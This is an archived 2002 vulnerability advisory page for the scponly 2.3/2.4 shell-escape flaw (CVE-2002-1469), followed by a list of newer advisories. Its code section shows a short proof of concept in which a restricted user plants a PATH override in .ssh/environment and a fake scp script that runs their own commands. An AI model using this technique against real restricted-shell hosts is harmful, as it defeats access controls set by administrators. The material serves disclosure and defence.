exploits , vulnerabilities , articles , SCPOnly SSH Environment Shell Escaping Vulnerability

Title	SCPOnly SSH Environment Shell Escaping Vulnerability
Published	2002-08-20-12:00AM
Updated	2002-08-20-07:52PM
Class	Configuration Error
CVE	CAN-2002-1469 CVE-2002-1469
Remote	No
Local	Yes
Credit	Vulnerability discovery credited to Derek D. Martin <ddm@pizzashack.org>.
Vulnerable	scponly scponly 2.4 scponly scponly 2.3
Not Vulnerable
Code	The following was provided by Derek D. Martin <ddm@pizzashack.org>: For example, the user could scp the following to $HOME/.ssh/environment: # ssh environment PATH=/home/myhomedir/:/usr/bin:/bin #end Subsequently, the user could upload the following file to their home directory, and call it scp: #!/bin/sh echo "I'm a bad boy" > /tmp/exploit /usr/bin/scp $@ # end When they next scp a file: [root@restricted /tmp] # ls -l total 24 -rw-r--r-- 1 bonehead bonehead 14 Aug 19 22:46 exploit [root@restricted /tmp] # cat exploit I'm a bad boy
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-12-04 Rae Media Web Based Contact Management Login SQL Injection Vulnerability
• 2008-12-04 Nagios External Commands and Adaptive Commands Unspecified Vulnerability
• 2008-12-04 Z1Exchange SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 mvnForum Cross Site Scripting Vulnerability
• 2008-12-04 i-Net Solution Orkut Clone SQL Injection and Cross Site Scripting Vulnerabilities
• 2008-12-04 Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
• 2008-12-04 Jbook SQL Injection Vulnerability
• 2008-12-04 SquirrelMail Malformed HTML Mail Message HTML Injection Vulnerability
• 2008-12-04 HP-UX Unspecified Local Denial Of Service Vulnerability
• 2008-12-04 Netrw Vim Script Information Disclosure Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 05 Dec 2008 16:57:36 +0000